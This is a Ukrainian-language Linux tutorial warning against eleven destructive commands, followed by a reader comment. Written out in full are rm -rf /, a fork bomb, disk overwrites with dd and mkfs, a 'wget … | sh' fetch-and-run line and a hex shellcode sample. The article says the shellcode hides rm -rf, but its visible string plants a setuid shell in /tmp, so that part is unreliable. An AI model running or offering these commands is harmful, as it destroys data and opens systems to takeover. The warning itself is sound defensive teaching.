Інтерфейс командного рядка – потужна та зручна утиліта для адміністрування системи Linux. Він забезпечує швидкий та універсальний спосіб запуску системи, особливо при керуванні безголовими системами, що не мають графічного інтерфейсу.
Хоча командний рядок корисний для керування вашою системою, він пов’язаний з ризиком. Виконання неправильних команд може завдати шкоди та непоправної шкоди вашій системі. У цьому посібнику ми склали список деяких із найбільш ризикованих команд, які вам не слід виконувати у вашій системі.
1. rm -rf/ команда
Команда rm – це команда Linux, яка використовується для видалення файлів і каталогів залежно від аргументів, що використовуються. Однак слід дотримуватись крайньої обережності при використанні команди rm, оскільки невелика помилка або помилка можуть призвести до непоправного пошкодження системи.
При виконанні від імені користувача root з параметром -rf / команда рекурсивно видаляє всі файли та каталоги у вашій системі, починаючи з кореня (/), що є найвищим у структурі файлової ієрархії Linux. Коротше кажучи, команда rm -rf / повністю стирає вашу систему, що призводить до поломки та неможливості відновлення системи.
Ось деякі параметри, що використовуються з командою rm.
Команда rm у Linux використовується для видалення файлів.
Команда rm -r рекурсивно видаляє папку, навіть пусту папку.
Команда rm -f видаляє файл лише для читання без запиту.
rm -rf / : Примусово видалити все в кореневому каталозі.
rm -rf * : Примусово видалити все у поточному каталозі/робочому каталозі.
rm-rf. : примусове видалення поточної папки та папок.
Насправді коли ви запускаєте команду як звичайний користувач, ви отримаєте два попередження на терміналі.
Щоб запобігти випадковому видаленню файлів командою “rm”, створіть псевдонім команди “rm” як “rm -i” у файлі “.bashrc”, він буде запитувати підтвердження кожного видалення.
2. :(){:|:&};: команда
Вищезгадане насправді форк-бомба. Вона працює, створюючи функцію з ім’ям ‘:’, яка викликає себе двічі, один раз на передньому плані та один раз у фоновому режимі. Функція виконується багаторазово і споживає всі системні ресурси, що призводить до збою системи.
Насправді команда fork bomb — це, по суті, форма DoS-атаки (відмова в обслуговуванні). Його також називають вірусом Wabbit чи Rabbit. Найгірше те, що вам не потрібно бути root, щоб запустити цю атаку.
На щастя, ви можете захистити себе від цієї атаки, обмеживши кількість процесів, які запускаються локальними користувачами, приблизно до 4000.
Ви можете це зробити, виконавши команду:
$ ulimit -S -u 4000
Пізніше ви можете перевірити це за допомогою команди:
$ ulimit -u
3. Команда >/dev/sda
Виконання команди, за якою слідує >/dev/sda, перезаписує блок /dev/sda на жорсткому диску. Цей блок містить дані файлової системи та при перезаписі призводить до незворотного пошкодження системи.
4. mv папка /dev/null
Ще одна небезпечна операція, яку вам не слід виконувати – це переміщення каталогу або файлу в /dev/null. Файл /dev/null — це файл особливого типу, відомий як нульовий пристрій або чорна діра. Все, що переміщується в /dev/null, відкидається та знищується.
Наступна команда переміщає весь вміст домашнього каталогу користувача /dev/null, тим самим видаляючи всі дані, що містяться в домашньому каталозі користувача.
# mv /home/user/* /dev/null
5. wget http://malicious_source -O- | sh
Wget — це команда, яка завантажує файли з веб-сервера або файлового сервера. Наведена вище команда завантажує скрипт із шкідливого джерела, а потім виконує його.
6. mkfs.ext3 /dev/sda
Команда mkfs створює нову файлову систему (ext2, ext3, ext4 тощо) на відформатованому пристрої зберігання, в більшості випадків на розділі жорсткого диска. Виконання команди mkfs на розділі стирає всі дані, що зберігаються в ньому.
Форматування всього диска (наприклад, mkfs.ext3 /dev/sda) корисне при форматуванні розділів диска, але воно призводить до збою системи та залишає її в невідновному стані. Це відбувається тому, що він знищує всі системні файли разом із вашими особистими даними.
Команда також може набувати інших форм, як показано нижче.
# mkfs.ext4 /dev/sda # mkfs.xfs /dev/sda # mkfs.btrfs /dev/sda
7. Команда > файл
> Файл стирає вміст файлу та залишає його порожнім. Це синонім команди cat/dev/null > file. Тому слід бути обережними при використанні операторів перенаправлення в системі Linux.
Нижче наведено демонстрацію того, як ця команда перезаписує текстовий файл. Ви можете уявити катастрофу, яку може викликати ця команда, якщо задіяний файл є файлом конфігурації.
8. ^foo^bar
Команда ^foo^bar настільки ж небезпечна, як і корисна, залежно від того, як вона виконується. Хоча це дозволяє вам редагувати раніше виконані команди та виконувати їх знову, це може мати катастрофічні наслідки, якщо ви не зацікавлені у змінах, внесених до команд перед їх запуском.
9. dd if=/dev/random of=/dev/sda
Наведена вище команда стирає блок /dev/sda і записує до блоку випадкові непотрібні дані. Ваша система залишиться на непослідовній та невідновній стадії.
10. Chmod -R 777 /
Хоча це може не призвести до негайного збою вашої системи Linux, команда chmod -R 777 / рекурсивно призначає всі дозволи (читання, запис та виконання) всім файлам у системі Linux, починаючи з кореня.
Це ефективно розкриває всі важливі конфігураційні файли та інші файли для всіх користувачів, і це представляє величезну загрозу безпеці для вашої системи. Будь-хто з мерзенними намірами може поратися з важливими файлами і легко зламати вашу систему.
11. Скрытая команда
Нижче наведена команда — це не що інше, як перша команда вище (rm -rf). Тут коди заховані у шістнадцятковому форматі, щоб необізнаний користувач міг бути обдурений. Виконання наведеного нижче коду у терміналі зітре ваш кореневий розділ.
Ця команда показує, що загроза може бути прихованою і іноді не виявленою. Ви повинні усвідомлювати, що ви робите і яким буде результат. Не компілюйте/запускайте коди з невідомого джерела.
char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
Примітка. Не виконуйте жодну з наведених вище команд у терміналі або оболонці Linux, а також на комп’ютері друга або шкільного комп’ютера. Якщо ви бажаєте протестувати їх, запустіть їх на віртуальній машині.
Будь-яка невідповідність або втрата даних через виконання вищезгаданої команди призведе до поломки вашої системи, за що ні Автор статті, ні linuxthebest не несуть відповідальності.
Я форк бомбу проверил на школьном компе и ЗАВИСЛО ВСЁ ЖОСКА
перезагрузили комп вроде норм